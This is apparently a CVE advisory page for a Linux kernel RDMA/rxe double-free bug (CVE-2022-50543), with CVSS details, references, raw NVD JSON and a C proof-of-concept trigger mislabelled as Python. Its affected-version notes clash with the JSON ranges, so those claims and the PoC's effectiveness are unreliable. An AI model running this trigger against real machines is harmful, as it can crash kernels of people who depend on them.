CVE-2022-50543

Description

In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix mr->map double free rxe_mr_cleanup() which tries to free mr->map again will be called when rxe_mr_init_user() fails: CPU: 0 PID: 4917 Comm: rdma_flush_serv Kdump: loaded Not tainted 6.1.0-rc1-roce-flush+ #25 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x45/0x5d panic+0x19e/0x349 end_report.part.0+0x54/0x7c kasan_report.cold+0xa/0xf rxe_mr_cleanup+0x9d/0xf0 [rdma_rxe] __rxe_cleanup+0x10a/0x1e0 [rdma_rxe] rxe_reg_user_mr+0xb7/0xd0 [rdma_rxe] ib_uverbs_reg_mr+0x26a/0x480 [ib_uverbs] ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x1a2/0x250 [ib_uverbs] ib_uverbs_cmd_verbs+0x1397/0x15a0 [ib_uverbs] This issue was firstly exposed since commit b18c7da63fcb ("RDMA/rxe: Fix memory leak in error path code") and then we fixed it in commit 8ff5f5d9d8cf ("RDMA/rxe: Prevent double freeing rxe_map_set()") but this fix was reverted together at last by commit 1e75550648da (Revert "RDMA/rxe: Create duplicate mapping tables for FMRs") Simply let rxe_mr_cleanup() always handle freeing the mr->map once it is successfully allocated.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.1（包含引入漏洞的commit b18c7da63fcb的版本）

Linux Kernel 6.1.0-rc1（确认受影响的版本）

所有包含RDMA/rxe子系统且未应用修复补丁的Linux内核版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2022-50543 - Linux Kernel RDMA/rxe Double Free PoC
 * This PoC triggers the double-free vulnerability by attempting to register
 * a memory region (MR) via RDMA user verbs in a way that causes
 * rxe_mr_init_user() to fail after mr->map allocation.
 *
 * Note: Requires RDMA/rxe module loaded and appropriate permissions.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>
#include <infiniband/verbs.h>

int main(int argc, char *argv[]) {
    struct ibv_device **dev_list;
    struct ibv_context *ctx;
    struct ibv_pd *pd;
    struct ibv_mr *mr;
    int ret;

    /* Get list of RDMA devices */
    dev_list = ibv_get_device_list(NULL);
    if (!dev_list || !dev_list[0]) {
        fprintf(stderr, "No RDMA devices found. Ensure rxe (Soft-RoCE) is loaded.\n");
        fprintf(stderr, "Load with: modprobe rdma_rxe\n");
        return 1;
    }

    /* Open the rxe device */
    ctx = ibv_open_device(dev_list[0]);
    if (!ctx) {
        fprintf(stderr, "Failed to open device: %s\n", strerror(errno));
        ibv_free_device_list(dev_list);
        return 1;
    }

    /* Allocate a Protection Domain */
    pd = ibv_alloc_pd(ctx);
    if (!pd) {
        fprintf(stderr, "Failed to allocate PD: %s\n", strerror(errno));
        ibv_close_device(ctx);
        ibv_free_device_list(dev_list);
        return 1;
    }

    /*
     * Trigger the vulnerability: Register an MR with invalid parameters
     * to cause rxe_mr_init_user() to fail after mr->map is allocated.
     * Using an unmapped/invalid address with specific access flags
     * to trigger the error path in rxe_reg_user_mr().
     */
    void *invalid_addr = (void *)0xDEADBEEF000ULL;
    size_t mr_size = 4096;

    /* Attempt to register MR with an invalid address to trigger error path */
    mr = ibv_reg_mr(pd, invalid_addr, mr_size,
                    IBV_ACCESS_LOCAL_WRITE | IBV_ACCESS_REMOTE_WRITE |
                    IBV_ACCESS_REMOTE_READ | IBV_ACCESS_MW_BIND);

    if (mr) {
        printf("MR registered (unexpected). Cleaning up.\n");
        ibv_dereg_mr(mr);
    } else {
        printf("MR registration failed as expected (errno=%d: %s)\n",
               errno, strerror(errno));
        printf("If vulnerable, check dmesg for kernel panic/double-free report.\n");
    }

    /* Cleanup */
    ibv_dealloc_pd(pd);
    ibv_close_device(ctx);
    ibv_free_device_list(dev_list);

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50543
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50543
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50543/
[4] VulDB https://vuldb.com/cve/CVE-2022-50543
[5] https://git.kernel.org/stable/c/06f73568f553b5be6ba7f6fe274d333ea29fc46d
[6] https://git.kernel.org/stable/c/6ce577f09013206e36e674cd27da3707b2278268
[7] https://git.kernel.org/stable/c/7d984dac8f6bf4ebd3398af82b357e1d181ecaac

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50543", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.687", "lastModified": "2026-02-26T23:17:13.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix mr->map double free\n\nrxe_mr_cleanup() which tries to free mr->map again will be called when\nrxe_mr_init_user() fails:\n\n CPU: 0 PID: 4917 Comm: rdma_flush_serv Kdump: loaded Not tainted 6.1.0-rc1-roce-flush+ #25\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n Call Trace:\n <TASK>\n dump_stack_lvl+0x45/0x5d\n panic+0x19e/0x349\n end_report.part.0+0x54/0x7c\n kasan_report.cold+0xa/0xf\n rxe_mr_cleanup+0x9d/0xf0 [rdma_rxe]\n __rxe_cleanup+0x10a/0x1e0 [rdma_rxe]\n rxe_reg_user_mr+0xb7/0xd0 [rdma_rxe]\n ib_uverbs_reg_mr+0x26a/0x480 [ib_uverbs]\n ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x1a2/0x250 [ib_uverbs]\n ib_uverbs_cmd_verbs+0x1397/0x15a0 [ib_uverbs]\n\nThis issue was firstly exposed since commit b18c7da63fcb (\"RDMA/rxe: Fix\nmemory leak in error path code\") and then we fixed it in commit\n8ff5f5d9d8cf (\"RDMA/rxe: Prevent double freeing rxe_map_set()\") but this\nfix was reverted together at last by commit 1e75550648da (Revert\n\"RDMA/rxe: Create duplicate mapping tables for FMRs\")\n\nSimply let rxe_mr_cleanup() always handle freeing the mr->map once it is\nsuccessfully allocated."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.19.4", "versionEndExcluding": "6.0.16", "matchCriteriaId": "2237FDD4-5AFF-4893-A8B4-C02F5784133F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/06f73568f553b5be6ba7f6fe274d333ea29fc46d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ce577f09013206e36e674cd27da3707b2278268", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d984dac8f6bf4ebd3398af82b357e1d181ecaac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}